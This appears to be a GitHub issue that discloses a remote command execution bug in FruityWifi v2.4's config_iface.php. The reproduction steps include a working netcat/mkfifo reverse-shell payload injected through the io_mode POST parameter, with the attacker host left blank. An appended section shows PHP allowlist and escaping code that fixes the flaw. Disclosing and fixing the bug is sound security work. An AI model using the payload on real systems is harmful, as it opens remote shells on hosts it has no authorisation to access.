xtr4nge / FruityWifi

FruityWiFi is a wireless network auditing tool. The application can be installed in any Debian based system (Jessie) adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq, NetHunter.
http://www.fruitywifi.com
GNU General Public License v3.0

Remote Command Execution in fruityWifi v2.4 #276

Open harsh-bothra opened 4 years ago

harsh-bothra commented 4 years ago

Issue Description

During the analysis of the software, it was observed that fruitywifi <=v2.4 allows a malicious actor to perform a Remote Command Execution. The issues were found in /scripts/config_iface.php due to improper handling of shell metacharacters which are a part of the "POST" request. An authenticated bad actor can exploit these issues by creating a malicious payload that contains shell metacharacters in the io_mode parameter of the "POST" request. This issue happens due to missing input validation in the requests, which allows execution of the commands.

Steps To Reproduce

1. Log into the application with credentials.
2. Navigate to the following URL: https://:port/scripts/config_iface.php.
3. Intercept the request with proxy tools such as Burp Suite and then change the request method to POST.
4. Now, add the "io_mode" parameter in the POST body and insert the following payload:

io_mode=\"'";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc++1337+>/tmp/f;#

5. Start a NC listener on port 1337.
6. Upon processing the request, you will be able to get the shell. Note: In order to bypass, we need to satisfy the quotes then insert our payload.
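The root cause stated in the report is a POST parameter reaching a shell without validation. The following is an added example of how a PHP handler can close that class of bug; it is not FruityWifi's code, and the function names, the interface-name pattern, the set of accepted io_mode values and the `iwconfig` command are assumptions for illustration only.

```php
<?php
// Added example (not FruityWifi's own code): validate request parameters
// against a strict allowlist before anything is handed to a shell, and
// quote with escapeshellarg() as a second layer.

// Assumed set of mode values the page is willing to accept.
const ALLOWED_IO_MODES = ['managed', 'monitor'];

/**
 * Return the validated io_mode, or null unless the input is exactly one
 * of the allowed strings. Strict comparison means no metacharacter,
 * quote or whitespace can ever be accepted.
 */
function validate_io_mode($value)
{
    if (!is_string($value)) {
        return null;
    }
    return in_array($value, ALLOWED_IO_MODES, true) ? $value : null;
}

/**
 * Return a validated interface name (letters, digits, '_', '.', '-',
 * at most 15 characters, matching the kernel limit) or null.
 */
function validate_iface($value)
{
    if (!is_string($value) || !preg_match('/^[A-Za-z0-9_.-]{1,15}$/', $value)) {
        return null;
    }
    return $value;
}

/**
 * Build the shell command only from values that passed validation.
 * escapeshellarg() is applied anyway (defense in depth); 'iwconfig' is
 * an assumed command for this illustration.
 */
function build_iface_command($iface, $io_mode)
{
    $if   = validate_iface($iface);
    $mode = validate_io_mode($io_mode);
    if ($if === null || $mode === null) {
        throw new InvalidArgumentException('rejected interface or io_mode value');
    }
    return 'iwconfig ' . escapeshellarg($if) . ' mode ' . escapeshellarg($mode);
}

// Request handling: invalid input is logged and refused, never executed.
$iface   = $_POST['iface']   ?? '';
$io_mode = $_POST['io_mode'] ?? '';
try {
    $cmd = build_iface_command($iface, $io_mode);
    // exec($cmd, $output, $rc);  // reached only with allowlisted arguments
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    error_log('config_iface: ' . $e->getMessage() . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    exit;
}
```

The allowlist, not the quoting, is what removes the injection: `escapeshellarg()` alone would still let an unexpected value through to the command line, whereas a closed set of accepted values makes the parameter data rather than syntax. Logging the rejection with the client address also gives operators a signal to alert on.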